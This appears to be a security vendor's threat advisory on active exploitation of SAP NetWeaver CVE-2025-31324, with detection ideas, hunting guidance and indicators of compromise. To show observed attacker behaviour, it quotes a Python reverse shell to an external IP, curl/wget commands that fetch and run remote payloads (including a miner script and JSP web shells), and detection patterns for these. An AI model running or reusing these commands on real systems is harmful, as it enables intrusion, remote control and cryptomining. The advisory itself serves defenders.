Red Canary has observed activity exploiting a newly-documented unrestricted file upload vulnerability in SAP NetWeaver Visual Composer, software used to develop enterprise applications for business analysts. CVE-2025-31324 has received a critical CVSS rating of 10.0, and we encourage patching immediately.
Red Canary Co-Founder Keith McCammon broke down Red Canary’s visibility into this exploitation in the April 29 episode of Office Hours:
What is CVE-2025-31324?
This vulnerability allows for unrestricted file uploads into a SAP NetWeaver server. By exploiting this vulnerability, an adversary may upload web shells and other arbitrary content to execute on the SAP NetWeaver server. SAP released a security advisory visible to customers of their support portal with additional guidance to patch affected components.
In addition, other security vendors have reported widespread exploitation:
- ReliaQuest Uncovers New Critical Vulnerability in SAP NetWeaver
- Active exploitation of SAP NetWeaver Visual Composer CVE-2025-31324 | Rapid7 Blog
- Active Exploitation of SAP CVE-2025-31324 Zero-Day | Onapsis
The vulnerability affects instances of SAP with NetWeaver 7.xx installed, including the service packs for that product.
Exploitation behavior
Public exploitation details are available for this vulnerability, and we are actively monitoring sources for additional information. Red Canary’s behavior-based approach to creating analytics enables detection of post-exploitation activity regardless of the vulnerability exploited, and that approach has identified instances of SAP NetWeaver exploitation in customer environments.
In one instance of exploitation, Red Canary observed Python reverse shell code spawning from known SAP processes:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((5.161.153[.]112,8443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([/bin/sh,-i]);In other instances of exploitation, we observed the manipulation of web shell files followed by the download and execution of additional tools:
mv ../apps/sap.com/irj/servlet_jsp/irj/root/helper.jsp ../apps/sap.com/irj/servlet_jsp/irj/root/usage.jsp
wget hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk -O /tmp/1 || curl -o /tmp/1 hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk
wget hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX -O /tmp/1 || curl -o /tmp/1 hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX
(curl -sk hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js || wget --no-check-certificate -q -O - hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js) | bash -sh
curl -O hxxps[://]ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh
curl -o /tmp/8bq.sh hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
curl -o /usr/sap/…/servlet_jsp/_default/root/forwardsap.jsp hxxps[://]devocional[.]click/download/forwardsap.jsp
curl hxxp[://]temp[.]sh/vvgtW/webhelper -o webhelp.jsp
curl hxxp[://]update.zoho-software[.]com:443/webhelper -o /usr/sap/…/servlet_jsp/irj/root/.webhelper.jsp
In these cases, the adversary also employed Base64 encoding of the commands to evade casual observation with process monitoring tools.
Detection opportunities
The following trio of detection opportunities are a great starting point for security teams to develop detection coverage for behaviors we have observed after exploitation of SAP NetWeaver:.
Base64-encoded commands in shell processes
This detector looks for adversaries leveraging encoded commands in Linux shell processes to download remotely hosted files.
process == (‘bash’)
&&
command_includes (‘base64, -d’)Curl downloading files in /tmp
This detection opportunity looks for adversaries leveraging curl to download files from a remote host into the /tmp folder.
process == (‘curl’)
&&
wrote/modified_executable
&&
command_includes (‘/tmp’)Python scripts establishing a socket to a remote host
This peudo-detector looks for adversaries using Python scripts to establish a socket to a remote host.
process == python
&&
command_includes (‘ -c ‘ || ‘.socket’)
&&
command_includes ('.call(‘ || '.spawn(')
Along with patching, we recommend examining SAP web server access logs for additional evidence of CVE-2025-31324 exploitation, specifically looking for evidence of unusual requests to the API endpoint /developmentserver/metadatauploader. If possible, consider disallowing access to that API endpoint from external networks. To hunt for additional evidence of web shell uploads, organizations can search for unexpected JSP files within these folders on SAP servers:
j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\rootj2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\workj2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync
Indicators
IP addresses
5.161.153[.]112
23.95.123[.]5
Domains
brandnav-cms-storage.s3.amazonaws[.]com
abode-dashboard-media.s3.ap-south-1.amazonaws[.]com
overseas-recognized-athens-oakland.trycloudflare[.]com
ocr-freespace.oss-cn-beijing.aliyuncs[.]com
devocional[.]click
update.zoho-software[.]com
URLs
hxxps[://]ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh
hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX
hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk
hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js
hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
hxxps[://]devocional[.]click/download/forwardsap.jsp
hxxp[://]temp[.]sh/vvgtW/webhelper
hxxp[://]update.zoho-software[.]com:443/webhelper
Malicious filenames
config.sh
/tmp/0
/tmp/1
.webhelper.jsp
.h.jsp
usage.jsp
usage1.jsp
helper.jsp
404_error.jsp
webhelp.jsp
forwardsap.jsp
/tmp/8bq.sh
1.sh